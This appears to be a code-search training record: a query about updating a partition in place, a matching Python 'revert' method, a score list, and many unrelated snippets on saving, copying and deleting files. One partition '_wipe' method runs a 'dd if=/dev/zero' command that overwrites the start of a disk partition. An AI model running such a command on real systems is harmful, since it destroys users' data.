"def copy_to_temp(object):\n temp_file = NamedTemporaryFile(delete=False)\n _copy_and_close(object, temp_file)\n return temp_file.name",
"def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()",
"def pickle(array, file):\r\n\timport cPickle\r\n\tfo = open(file,'wb')\r\n\tcPickle.dump(array,fo)\r\n\tfo.close()",
"def deleteOutFiles(self, onlytmp=True):\n self.linkNodes()\n for node in self.sort():\n file = node.outputpath\n if (not onlytmp or file[0:4]=='tmp.'):\n logger.info(\"Deleting output file '%s'\" % file)\n dfs.delete(file)",
"def array(self):\n config = self.config\n\n unique_array = config[\"unique_subarray\"]\n\n p_axes = self.axes\n p_flip = self.flip\n p_part = self.part\n p_units = self.Units\n p_shape = self.shape\n p_location = self.location\n subarray = self._subarray\n\n len_p_axes = len(p_axes)\n\n if not self.in_memory:\n # --------------------------------------------------------\n # The subarray is not in memory.\n #\n # It could be in a file on disk or implied by a FileArray\n # object, etc.\n # --------------------------------------------------------\n self._original = self.copy()\n\n unique_array = True\n update = True\n copy = False\n\n if not p_part:\n indices = Ellipsis\n else:\n indices = tuple(p_part)\n\n # Read from a file into a numpy array\n p_data = subarray[indices]\n\n # We've just copied p_data from disk, so in place changes\n # are not possible\n in_place_changes = False\n else:\n # --------------------------------------------------------\n # The subarray is in memory\n # --------------------------------------------------------\n update = config[\"update\"]\n\n if p_part:\n p_data = get_subspace(subarray, p_part)\n elif not unique_array:\n p_data = subarray.view()\n else:\n p_data = subarray\n\n copy = config[\"extra_memory\"]\n\n # In place changes to p_data might be possible if we're not\n # copying the data\n in_place_changes = not copy\n\n if not p_data.ndim and isinstance(p_data, (numpy_number, numpy_bool_)):\n # --------------------------------------------------------\n # p_data is a numpy number (like numpy.int64) which does\n # not support assignment, so convert it to a numpy array.\n # --------------------------------------------------------\n p_data = numpy_array(p_data)\n # We've just copied p_data, so in place changes are\n # not possible\n copy = False\n in_place_changes = False\n\n masked = numpy_ma_isMA(p_data)\n if masked:\n # The p_data is a masked array\n if p_data.mask is numpy_ma_nomask or not numpy_ma_is_masked(\n p_data\n ):\n # There are no missing data points so recast as an\n # unmasked numpy array\n p_data = p_data.data\n masked = False\n # --- End: if\n\n if masked:\n # Set the hardness of the mask\n if config[\"hardmask\"]:\n p_data.harden_mask()\n else:\n p_data.soften_mask()\n # --- End: if\n\n self.masked = masked\n\n # ------------------------------------------------------------\n # Make sure that the data array has the correct units. This\n # process will deep copy the data array if required (e.g. if\n # another partition is referencing this numpy array), even if\n # the units are already correct.\n # ------------------------------------------------------------\n func = config.get(\"func\")\n units = config[\"units\"]\n if func is None:\n if not p_units.equals(units) and bool(p_units) is bool(units):\n func = Units.conform\n\n if func is not None:\n inplace = not copy\n p_data = func(p_data, p_units, units, inplace)\n p_units = units\n\n if not inplace:\n # We've just copied p_data, so in place changes are\n # not possible\n copy = False\n in_place_changes = False\n # --- End: if\n\n flip = config.get(\"flip\", None)\n if flip or p_flip:\n flip_axes = set(p_flip).symmetric_difference(flip)\n else:\n flip_axes = None\n\n axes = config[\"axes\"]\n\n if p_data.size > 1:\n # --------------------------------------------------------\n # Flip axes\n # --------------------------------------------------------\n if flip_axes:\n indices = [\n (\n slice(None, None, -1)\n if axis in flip_axes\n else slice(None)\n )\n for axis in p_axes\n ]\n p_data = p_data[tuple(indices)]\n\n # --------------------------------------------------------\n # Transpose axes\n # --------------------------------------------------------\n if p_axes != axes:\n iaxes = [p_axes.index(axis) for axis in axes if axis in p_axes]\n\n if len_p_axes > len(iaxes):\n for i in range(len_p_axes):\n if i not in iaxes:\n # iaxes.append(i)\n iaxes.insert(i, i)\n # --- End: if\n\n p_data = numpy_transpose(p_data, iaxes)\n # --- End: if\n\n # ------------------------------------------------------------\n # Remove excessive/insert missing size 1 axes\n # ------------------------------------------------------------\n if p_shape != p_data.shape:\n # if len_p_axes != len(p_shape):\n p_data = p_data.reshape(p_shape)\n\n # ------------------------------------------------------------\n # Apply the auxiliary mask\n # ------------------------------------------------------------\n auxiliary_mask = config[\"auxiliary_mask\"]\n if auxiliary_mask:\n for mask in auxiliary_mask:\n if mask.any():\n if not masked:\n p_data = p_data.view(numpy_ma_MaskedArray)\n masked = True\n\n p_data.mask = (mask | p_data.mask).array\n # --- End: for\n\n self.masked = True\n\n # ------------------------------------------------------------\n # Convert the array's data type\n # ------------------------------------------------------------\n p_dtype = p_data.dtype\n dtype = config.get(\"dtype\", None)\n if dtype is not None and dtype != p_dtype:\n try:\n p_data = p_data.astype(dtype) # Note: returns a copy\n except ValueError:\n raise ValueError(\n \"Can't recast partition array from {} to {}\".format(\n p_dtype.name, dtype.name\n )\n )\n else:\n # We've just copied p_data, so in place changes are\n # not possible\n copy = False\n in_place_changes = False\n # --- End: if\n\n # ------------------------------------------------------------\n # Copy the array\n # -----------------------------------------------------------\n if copy:\n if p_dtype.char != \"O\":\n if not masked or p_data.ndim > 0:\n p_data = p_data.copy()\n else:\n # This is because numpy.ma.copy doesn't work for\n # scalar arrays (at the moment, at least)\n p_data = numpy_ma_masked_all((), p_data.dtype)\n\n # We've just copied p_data, so in place changes are\n # not possible\n in_place_changes = False\n else:\n # whilst netCDF4.netcdftime.datetime is mucking bout,\n # don't copy!!!!\n # p_data = _copy(p_data)\n pass\n # --- End: if\n\n # ------------------------------------------------------------\n # Update the partition\n # ------------------------------------------------------------\n if update:\n self.subarray = p_data # ?? DCH CHECK\n self.Units = p_units\n self.part = []\n self.axes = axes\n self.flip = flip\n self.flatten = []\n self.shape = p_shape\n self.location = p_location\n\n self._in_place_changes = in_place_changes\n\n # ------------------------------------------------------------\n # Return the numpy array\n # ------------------------------------------------------------\n return p_data",
"def save(self, path):\n np.save(path, self.q)",
"def save_spike_position(spike_position, savepath):\n for key in spike_position:\n for idx in list(range(len(spike_position[key]))):\n spike_position[key][idx] = spike_position[key][idx].reshape((len(spike_position[key][idx]), 1))\n sio.savemat(savepath, {'spike_pos': spike_position})",
"def save(file, arr, allow_pickle=True, fix_imports=True):\n\n return numpy.save(file, array_create.array(arr, bohrium=False), allow_pickle, fix_imports)",
"def test_change_non_empty_dir_to_file(self):\n dir0, dir1 = self.make_temp_dirs(2)\n self.write_file(dir0, \"foo/bar\", \"baz\")\n self.sync_all()\n self.assertFile(dir0, \"foo/bar\", \"baz\")\n self.assertFile(dir1, \"foo/bar\", \"baz\")\n\n self.delete_file(dir0, \"foo/bar\")\n self.delete_dir(dir0, \"foo\")\n self.write_file(dir0, \"foo\", \"bar\")\n self.sync_all()\n self.assertFile(dir0, \"foo\", \"bar\")\n self.assertFile(dir1, \"foo\", \"bar\")",
"def writer(self, size=None):\n data_file = os.path.join(self.put_datadir, self._obj)\n\n # Assume the full directory path exists to the file already, and\n # construct the proper name for the temporary file.\n attempts = 1\n cur_thread = str(getcurrent())\n while True:\n postfix = md5(self._obj + _cur_host + _cur_pid + cur_thread\n + str(random.random())).hexdigest()\n tmpfile = '.' + self._obj + '.' + postfix\n tmppath = os.path.join(self.put_datadir, tmpfile)\n try:\n fd = do_open(tmppath,\n os.O_WRONLY | os.O_CREAT | os.O_EXCL | O_CLOEXEC)\n except GlusterFileSystemOSError as gerr:\n if gerr.errno == errno.ENOSPC:\n # Raise DiskFileNoSpace to be handled by upper layers\n raise DiskFileNoSpace()\n if gerr.errno not in (errno.ENOENT, errno.EEXIST, errno.EIO):\n # FIXME: Other cases we should handle?\n raise\n if attempts >= MAX_OPEN_ATTEMPTS:\n # We failed after N attempts to create the temporary\n # file.\n raise DiskFileError('DiskFile.mkstemp(): failed to'\n ' successfully create a temporary file'\n ' without running into a name conflict'\n ' after %d of %d attempts for: %s' % (\n attempts, MAX_OPEN_ATTEMPTS,\n data_file))\n if gerr.errno == errno.EEXIST:\n # Retry with a different random number.\n attempts += 1\n elif gerr.errno == errno.EIO:\n # FIXME: Possible FUSE issue or race condition, let's\n # sleep on it and retry the operation.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif not self._obj_path:\n # No directory hierarchy and the create failed telling us\n # the container or volume directory does not exist. This\n # could be a FUSE issue or some race condition, so let's\n # sleep a bit and retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif attempts > 1:\n # Got ENOENT after previously making the path. This could\n # also be a FUSE issue or some race condition, nap and\n # retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\" % gerr)\n attempts += 1\n else:\n # It looks like the path to the object does not already\n # exist; don't count this as an attempt, though, since\n # we perform the open() system call optimistically.\n self._create_dir_object(self._obj_path)\n else:\n break\n dw = None\n try:\n # Ensure it is properly owned before we make it available.\n do_fchown(fd, self.uid, self.gid)\n # NOTE: we do not perform the fallocate() call at all. We ignore\n # it completely.\n dw = DiskWriter(self, fd, tmppath, self.threadpool)\n yield dw\n finally:\n try:\n if dw.fd:\n do_close(dw.fd)\n except OSError:\n pass\n if dw.tmppath:\n do_unlink(dw.tmppath)",
"def save(self, patch):\n internalSlices = self._get_internal_slices(patch.slices)\n self.array[internalSlices] = patch.array",
"def save_prime_array(number_of_primes) -> None:\n p = prime_array(number_of_primes)\n with open(f'prime{number_of_primes}.bin', 'wb') as prime_file:\n p.tofile(prime_file)\n \n return None",
"def test_save_trajectory_dataset():\n import tempfile\n import MDAnalysis.coordinates\n\n pdb_file_path = os.path.join(os.path.dirname(__file__), 'data', 'chloro-fluoromethane.pdb')\n\n # Load the test PDB file.\n with MDAnalysis.coordinates.PDB.PDBReader(pdb_file_path) as trajectory:\n\n # Create a nested subset of a TrajectoryDataset.\n dataset = TrajectoryDataset(trajectory)\n nested_subset = TrajectorySubset(dataset, indices=[0, 2, 4])\n subset = TrajectorySubset(nested_subset, indices=[0, 2])\n\n for d, indices in [\n (dataset, range(len(trajectory))),\n (subset, [0, 4])\n ]:\n for custom_positions in [\n None,\n _random_state.randn(len(d), trajectory.n_atoms, 3) * 10\n ]:\n # We write the file in a temporary location.\n temp_file_path = None\n try:\n f = tempfile.NamedTemporaryFile(delete=True, suffix='.pdb')\n temp_file_path = f.name\n f.close()\n\n d.save(\n pdb_file_path,\n output_file_path=temp_file_path,\n positions=custom_positions,\n multiframe=True\n )\n\n # Check that the function has saved the correct positions/frames.\n if custom_positions is None:\n _check_saved_trajectory(temp_file_path, dataset, indices=indices)\n else:\n _check_saved_trajectory(temp_file_path, custom_positions)\n\n # Check also that writing custom positions leave the original data intact.\n for saved_idx, reference_idx in enumerate(indices):\n original_positions = dataset.get_ts(reference_idx).positions\n assert not np.allclose(original_positions, custom_positions[saved_idx],\n atol=1e-2, rtol=0.0)\n finally:\n # Make sure the temporary file is deleted.\n if temp_file_path is not None:\n os.unlink(temp_file_path)",
"def write_to_local(path, data_rec):\n path, filename = os.path.split(path)\n with open(filename, 'wb') as f:\n f.write(data_rec)\n f.close()",
"def test_custom_local_output_file_with_overwrite() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n output_file_location = os.path.join(tmpdirname, \"foo.txt\")\n\n # Create a file in the temporary directory\n with open(output_file_location, \"wb\") as write_file:\n write_file.write(b\"foo\")\n\n # Instantiate an output file\n output_file = PyArrowFileIO().new_output(location=f\"{output_file_location}\")\n\n # Confirm that a FileExistsError is raised when overwrite=False\n with pytest.raises(FileExistsError):\n f = output_file.create(overwrite=False)\n f.write(b\"foo\")\n\n # Confirm that the file is overwritten with overwrite=True\n f = output_file.create(overwrite=True)\n f.write(b\"bar\")\n with open(output_file_location, \"rb\") as f:\n assert f.read() == b\"bar\"",
"def dump_to_tmpfile(obj):\n\n import tempfile\n\n fname = tempfile.mktemp()\n with open(fname, \"w\") as txtfile:\n txtfile.write(str(obj))\n\n print(\"str(obj) was written to {}\".format(fname))\n\n return fname",
"def write_torque_table(A, filename):\n f = open(filename, 'w')\n for row in range(np.size(A, axis=0)):\n A[row,:].tofile(f, sep=',')\n f.write('\\n')\n f.close()",
"def create_test_file(filename, array):\n array = np.ma.asanyarray(array)\n crs = rasterio.crs.CRS(init='epsg:4326')\n transform = from_origin(52, 4, 10, 10)\n with rasterio.open(\n filename,\n mode='w',\n driver='GTiff',\n width=array.shape[1],\n height=array.shape[2],\n count=array.shape[0],\n dtype=array.dtype,\n crs=crs,\n transform=transform) as dataset:\n for band, data in enumerate(array, start=1):\n dataset.write(data, band)",
"def save_to_file(content, song_name):\n file = open(\"./assets/homemade_partitions.txt\", \"a+\")\n # Move to the start of the file\n file.seek(0)\n # Read the total lines\n total_lines = len(file.readlines())\n # Move to the end of the file\n file.seek(0, 2)\n # Write the song's name\n file.write(f\"#{int(total_lines / 2 + 1)} {song_name}\\n\")\n # Write the song's partition\n file.write(content + \"\\n\")\n file.close()",
"def write(self, filename, text):\r\n self._call(\"-rm\", filename)\r\n with temporary_file() as fp:\r\n fp.write(text)\r\n fp.flush()\r\n return self._call('-copyFromLocal', fp.name, filename)",
"def test_write_file_to_disk_str(self):\r\n file_data = 'A' * 100\r\n write_file_to_disk(self.test_file3, file_data)\r\n self.file_contents_is_equal(self.test_file3, file_data)",
"def _generate_to_tempfile(self, generator):\r\n (output_fd, output_path) = tempfile.mkstemp()\r\n with os.fdopen(output_fd, 'w') as output:\r\n generator.write(output)\r\n return output_path",
"def copy_to_temp(self,\r\n index,\r\n tempobject):\r\n\r\n tempobject.load(index,\r\n self.get_note(index))\r\n self.display_buffer.append(index_reduce(str(index))+alerts.COPIED_TO_TEMP)",
"def test_file_writing_multiple_points_at_once_two_steps_recarray_input(\n self):\n with IndexedRaggedTs(self.testfilename, n_loc=4, mode=\"w\") as dataset:\n locations = np.array([1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3])\n data = {\n \"test\":\n np.concatenate([np.arange(2),\n np.arange(5),\n np.arange(6)])\n }\n dates = []\n for n_data in [2, 5, 6]:\n base = datetime(2007, 1, n_data)\n dates.append(\n np.array(\n [base + timedelta(hours=i) for i in range(n_data)]))\n dates = np.concatenate(dates)\n data = np.array(data[\"test\"],\n dtype={\n \"names\": [\"test\"],\n \"formats\": [\"i8\"]\n })\n dataset.write(locations,\n data,\n dates,\n loc_descr=[\"first station\"] * 13,\n lon=locations,\n lat=locations,\n alt=locations)\n\n with IndexedRaggedTs(self.testfilename, n_loc=4, mode=\"a\") as dataset:\n locations = np.array([1, 1, 4, 4])\n data = {\"test\": np.concatenate([np.arange(2), np.arange(2)])}\n dates = []\n for n_data in [2, 2]:\n base = datetime(2007, 2, n_data)\n dates.append(\n np.array(\n [base + timedelta(hours=i) for i in range(n_data)]))\n dates = np.concatenate(dates)\n\n data = np.array(data[\"test\"],\n dtype={\n \"names\": [\"test\"],\n \"formats\": [\"i8\"]\n })\n dataset.write(locations,\n data,\n dates,\n loc_descr=[\"first station\"] * 4,\n lon=locations,\n lat=locations,\n alt=locations)\n\n with IndexedRaggedTs(self.testfilename) as dataset:\n for gpis, n_data, base_month in zip([1, 2, 3, 4], [2, 5, 6, 2],\n [1, 1, 1, 2]):\n data = dataset.read_all(gpis)\n if gpis == 1:\n nptest.assert_array_equal(\n data[\"test\"],\n np.concatenate([np.arange(n_data),\n np.arange(n_data)]))\n else:\n nptest.assert_array_equal(data[\"test\"], np.arange(n_data))\n test_dates = []\n base = datetime(2007, base_month, n_data)\n test_dates.append(\n np.array(\n [base + timedelta(hours=i) for i in range(n_data)]))\n if gpis == 1:\n base = datetime(2007, 2, n_data)\n test_dates.append(\n np.array([\n base + timedelta(hours=i) for i in range(n_data)\n ]))\n\n dates = np.concatenate(test_dates)\n nptest.assert_array_equal(data[\"time\"], dates)",
"def compact(self):\n\n # create a collection list for each bucket\n bucket_to_list_node_dict = {}\n # we need to ensure all buckets should have a collection list\n for bucket in self._buckets:\n bucket_to_list_node_dict[bucket] = []\n for node in self._disk_objects:\n bucket_object = node.value\n assert not bucket_object.is_in_memory()\n bucket_to_list_node_dict[bucket_object.bucket].append(node)\n # bucket by bucket processing\n for bucket, node_list in bucket_to_list_node_dict.items():\n with open(bucket.filepath, \"rb\") as source_file:\n tmp_filepath = bucket.filepath + \".tmp\"\n tmp_offset, tmp_addresses = 0, []\n with open(tmp_filepath, \"wb\") as target_file:\n # copy bytes from filepath to tmp_filepath\n for node in node_list:\n bucket_object = node.value\n source_file.seek(bucket_object.value.address)\n header = source_file.read(4)\n data_length = self._byte_array_to_integer(header)\n data = source_file.read(data_length)\n target_file.write(header + data)\n tmp_addresses.append(tmp_offset)\n tmp_offset += len(header + data)\n # swap files in physical disk\n os.rename(tmp_filepath, bucket.filepath)\n # remove all bucket_object from object_to_list_node dict\n for node in node_list:\n self._object_to_list_node.pop(node.value)\n # update disk address and object_to_list_node dict\n for node, address in zip(node_list, tmp_addresses):\n bucket_object = node.value\n bucket_object.value.address = address\n self._object_to_list_node[bucket_object] = node\n # update bucket's offset, very important in compaction\n bucket._offset = tmp_offset",
"def _create_sparsed_file(self, nms, path, size):\n nms.appliance.execute(\n 'truncate --size %(size)dG %(path)s' % {\n 'path': path,\n 'size': size\n }\n )",
"def numpy_2_file(narray, file, path=OUTPUT_PATH, sep=',' ):\n file_path = path + file\n narrayc = numpy.copy(narray)\n numpy.place(narrayc,numpy.logical_or(narrayc==-1,narrayc==-2), 2)\n dataset = numpy.copy(narrayc).astype(str)\n numpy.place(dataset,dataset=='2', '*')\n d=numpy.atleast_2d(dataset)\n numpy.savetxt(file_path, d, delimiter=sep, fmt='%s')\n return",
"def write_pickle_object_to_file(self, inpobj):\n with gzip.open('%s.tmp' % self.pickle_file, 'wb') as pkl_file:\n pickle.dump(inpobj, pkl_file, pickle.HIGHEST_PROTOCOL)\n run_command('mv %s.tmp %s' % (self.pickle_file, self.pickle_file))\n return True",
"def output_file(newarray, filename):\n np.savetxt(filename + \"_formatted.txt\", newarray, delimiter=\" \", fmt=\"%s\")",
"def truncate(data_path: str, n_chunks: int, idx=0):\n lines = open(data_path, 'r').readlines()\n n = len(lines)\n print('{} lines in original dataset'.format(n))\n chunk_size = round(len(lines) / int(n_chunks))\n print('{} lines in truncated dataset'.format(chunk_size))\n # get to idx block (so idx * x)\n start_id = idx * chunk_size\n output = lines[start_id:start_id+chunk_size]\n # write the next x lines in the output file (done)\n with open('trunc{}p_{}'.format(n_chunks, data_path), 'w') as out:\n for l in output:\n out.write(l)"
] | [
"0.58671135",
"0.56434155",
"0.5580373",
"0.5417111",
"0.5385665",
"0.5372569",
"0.53123814",
"0.52139175",
"0.5193834",
"0.51137465",
"0.5101339",
"0.5099379",
"0.50423723",
"0.5027432",
"0.50095487",
"0.5004623",
"0.49991313",
"0.4995337",
"0.49318588",
"0.49247873",
"0.4896562",
"0.48937136",
"0.48899746",
"0.48796624",
"0.48620802",
"0.48261485",
"0.48148912",
"0.47867736",
"0.4782684",
"0.477437",
"0.47739702",
"0.47738385",
"0.4769095",
"0.4763525",
"0.47622937",
"0.4759557",
"0.4751665",
"0.47383544",
"0.47241423",
"0.47106767",
"0.47092134",
"0.47032487",
"0.4698778",
"0.4675477",
"0.467135",
"0.46627998",
"0.46620122",
"0.46605238",
"0.46597573",
"0.4651026",
"0.46350136",
"0.46334973",
"0.46317053",
"0.46288842",
"0.46239078",
"0.4622872",
"0.4617189",
"0.46169776",
"0.46063033",
"0.46062872",
"0.46036565",
"0.46012673",
"0.4597424",
"0.45851782",
"0.45831677",
"0.4576443",
"0.4576244",
"0.4574653",
"0.45746404",
"0.4573864",
"0.45729882",
"0.45715222",
"0.45694488",
"0.45692518",
"0.45596611",
"0.4551125",
"0.45426592",
"0.45369437",
"0.4535683",
"0.4533931",
"0.45280266",
"0.45250997",
"0.45243233",
"0.45214406",
"0.45179743",
"0.4514823",
"0.45076314",
"0.45021644",
"0.44962186",
"0.44953623",
"0.44880113",
"0.44818914",
"0.44801918",
"0.447523",
"0.44725376",
"0.4468557",
"0.4468355",
"0.44640532",
"0.44591728",
"0.44587877"
] | 0.6427523 | 0 |
Completely update the partition with another partition's attributes in place. The updated partition is always dependent of the other partition. | def revert(self):
original = getattr(self, "_original", None)
if not original:
return
if hasattr(self, "output"):
output = self.output
keep_output = True
else:
keep_output = False
del self._original
self.__dict__ = original.__dict__
if keep_output:
self.output = output | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def update(self, metadata):\n p_metas = metadata.partitions\n\n # Remove old partitions\n removed = set(self._partitions.keys()) - set(p_metas.keys())\n if len(removed) > 0:\n log.info('Removing %d partitions', len(removed))\n for id_ in removed:\n log.debug('Removing partition %s', self._partitions[id_])\n self._partitions.pop(id_)\n\n # Add/update current partitions\n brokers = self._cluster.brokers\n if len(p_metas) > 0:\n log.info(\"Adding %d partitions\", len(p_metas))\n for id_, meta in iteritems(p_metas):\n if meta.leader not in brokers:\n raise LeaderNotAvailable()\n if meta.id not in self._partitions:\n log.debug('Adding partition %s/%s', self.name, meta.id)\n self._partitions[meta.id] = Partition(\n self, meta.id,\n brokers[meta.leader],\n [brokers[b] for b in meta.replicas],\n [brokers[b] for b in meta.isr],\n )\n else:\n self._partitions[id_].update(brokers, meta)",
"def update_partition(self, event) -> None:\n self.min_width = 150 * len(self.partition)\n self.request_update()",
"def _setPartedPartition(self, partition):\n log_method_call(self, self.name)\n\n if partition is not None and not isinstance(partition, parted.Partition):\n raise ValueError(\"partition must be None or a parted.Partition instance\")\n\n log.debug(\"device %s new partedPartition %s\", self.name, partition)\n self._partedPartition = partition\n self.updateName()",
"def partition2(self, partition2):\n\n self._partition2 = partition2",
"def update_partition(self, bulk_ad_group_product_partition):\n\n if bulk_ad_group_product_partition is not None and bulk_ad_group_product_partition.ad_group_criterion is not None:\n bulk_ad_group_product_partition.ad_group_criterion.AdGroupId=self._ad_group_id\n bulk_ad_group_product_partition.ad_group_criterion.Status=None\n if hasattr(bulk_ad_group_product_partition.ad_group_criterion, 'EditorialStatus'):\n bulk_ad_group_product_partition.ad_group_criterion.EditorialStatus=None\n self._partition_actions.append(bulk_ad_group_product_partition)",
"def update(self, instance, validated_data):\n for attr, value in list(validated_data.items()):\n if attr == 'part_details':\n for a, v in list(value.items()):\n setattr(instance.part_details, attr, value)\n else:\n setattr(instance, attr, value)\n instance.save()\n return instance",
"def update_part(session=None, data=None):\n data_dict = format_and_check_update_part_request(data)\n if data_dict is None:\n return False\n\n with mc.MCSessionWrapper(session=session) as session:\n for dkey, dval in data_dict.items():\n hpn_to_change = dval[0][0]\n rev_to_change = dval[0][1]\n part_rec = session.query(Parts).filter(\n (func.upper(Parts.hpn) == hpn_to_change.upper())\n & (func.upper(Parts.hpn_rev) == rev_to_change.upper())\n )\n num_part = part_rec.count()\n if num_part == 0:\n part = Parts()\n elif num_part == 1:\n part = part_rec.first()\n set_an_attrib = False\n for d in dval:\n try:\n getattr(part, d[2])\n setattr(part, d[2], d[3])\n set_an_attrib = True\n except AttributeError:\n print(d[2], \"does not exist as a field\")\n continue\n if set_an_attrib:\n session.add(part)\n session.commit()\n cm_utils.log(\"cm_partconnect part update\", data_dict=data_dict)\n\n return True",
"def PatchPartition(self, target, source, patch):\n self._CheckSecondTokenNotSlotSuffixed(target, \"PatchPartitionExpr\")\n self._CheckSecondTokenNotSlotSuffixed(source, \"PatchPartitionExpr\")\n self.PatchPartitionExpr('\"%s\"' % target, '\"%s\"' % source, '\"%s\"' % patch)",
"def _computeResize(self, partition, newsize=None):\n log_method_call(self, self.name, status=self.status)\n\n if newsize is None:\n newsize = self.targetSize\n\n # compute new size for partition\n currentGeom = partition.geometry\n currentDev = currentGeom.device\n newLen = int(newsize) / currentDev.sectorSize\n newGeometry = parted.Geometry(device=currentDev,\n start=currentGeom.start,\n length=newLen)\n # and align the end sector\n if newGeometry.length < currentGeom.length:\n align = self.disk.format.endAlignment.alignUp\n alignGeom = currentGeom # we can align up into the old geometry\n else:\n align = self.disk.format.endAlignment.alignDown\n alignGeom = newGeometry\n\n newGeometry.end = align(alignGeom, newGeometry.end)\n constraint = parted.Constraint(exactGeom=newGeometry)\n\n return (constraint, newGeometry)",
"def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()",
"def disk_update(context, disk_id, values):\n return NotImplemented",
"def preCommitFixup(self):\n log_method_call(self, self.name)\n if not self.exists or not self.disklabelSupported:\n return\n\n # find the correct partition on the original parted.Disk since the\n # name/number we're now using may no longer match\n _disklabel = self.disk.originalFormat\n\n if self.isExtended:\n # getPartitionBySector doesn't work on extended partitions\n _partition = _disklabel.extendedPartition\n log.debug(\"extended lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n else:\n # lookup the partition by sector to avoid the renumbering\n # nonsense entirely\n _sector = self.partedPartition.geometry.start\n _partition = _disklabel.partedDisk.getPartitionBySector(_sector)\n log.debug(\"sector-based lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n\n self.partedPartition = _partition",
"def partition1(self, partition1):\n\n self._partition1 = partition1",
"def _setSize(self, newsize):\n log_method_call(self, self.name,\n status=self.status, size=self._size, newsize=newsize)\n if not isinstance(newsize, Size):\n raise ValueError(\"new size must of type Size\")\n\n if not self.exists:\n # device does not exist (a partition request), just set basic values\n self._size = newsize\n self.req_size = newsize\n self.req_base_size = newsize\n\n if self.exists:\n super(PartitionDevice, self)._setSize(newsize)\n return\n\n # the rest is for changing the size of an allocated-but-not-existing\n # partition, which I'm not sure is advisable\n if self.disk and newsize > self.disk.size:\n raise ValueError(\"partition size would exceed disk size\")\n\n if not self.partedPartition:\n log.warn(\"No partedPartition, not adjusting geometry\")\n return\n\n maxAvailableSize = Size(self.partedPartition.getMaxAvailableSize(unit=\"B\"))\n\n if newsize > maxAvailableSize:\n raise ValueError(\"new size is greater than available space\")\n\n # now convert the size to sectors and update the geometry\n geometry = self.partedPartition.geometry\n physicalSectorSize = geometry.device.physicalSectorSize\n\n new_length = int(newsize) / physicalSectorSize\n geometry.length = new_length",
"def _lock_partition(self, partition, shared=False):\n pass",
"def _update(self, device=None):\n self._attr_available = True\n self.schedule_update_ha_state(True)",
"def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)",
"def test_partial_updates(self):\r\n m1 = TestSetModel.create(int_set={1, 2, 3, 4})\r\n\r\n m1.int_set.add(5)\r\n m1.int_set.remove(1)\r\n assert m1.int_set == {2, 3, 4, 5}\r\n\r\n m1.save()\r\n\r\n m2 = TestSetModel.get(partition=m1.partition)\r\n assert m2.int_set == {2, 3, 4, 5}",
"def update(self, other):\n b = self.hallucinate_merge(other)\n self.l_child = b.l_child\n self.r_child = b.r_child",
"def set_partition(self, begin=0, end=0):\r\n self.partition = (begin, end)",
"def on_partition_change(self, new_partitions):\n if new_partitions is None:\n self.conn.create(self.partition_path, value=self.partitions)\n return\n\n if new_partitions != self.partitions:\n self.partitions = new_partitions\n self.rebalance()\n\n self.partitions_collected.set()",
"def update(self, other):\n self._start = other._start\n self._end = other._end\n self._nodes = {k: v.copy() for k,v in other._nodes.iteritems()}\n self._edges = {k: set(v) for k,v in other._edges.iteritems()}\n self._names = set(other._names)\n self.current = other.current",
"def soft_update(self, other, tau):\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)",
"def partitioning_attribute(self, partitioning_attribute):\n\n self._partitioning_attribute = partitioning_attribute",
"def hard_update(self,target, source):\n\t\tfor target_param, param in zip(target.parameters(), source.parameters()):\n\t\t\t\ttarget_param.data.copy_(param.data)",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def provide_partition_info(self):\n self.partition_info = True",
"def get_assignment_for_partition_update(self, topic_name, partitions):\n all_brokers = []\n assign = {'partitions': {}, 'version': 1}\n\n _, _, _, replicas, _, _ = self.get_partitions_for_topic(topic_name)[0]\n total_replica = len(replicas)\n\n for node_id, _host, _port, _rack in self.get_brokers():\n all_brokers.append(node_id)\n brokers_iterator = itertools.cycle(all_brokers)\n\n for i in range(partitions):\n assign_tmp = []\n for _j in range(total_replica):\n assign_tmp.append(next(brokers_iterator))\n assign['partitions'][str(i)] = assign_tmp\n\n return bytes(str(json.dumps(assign)).encode('ascii'))",
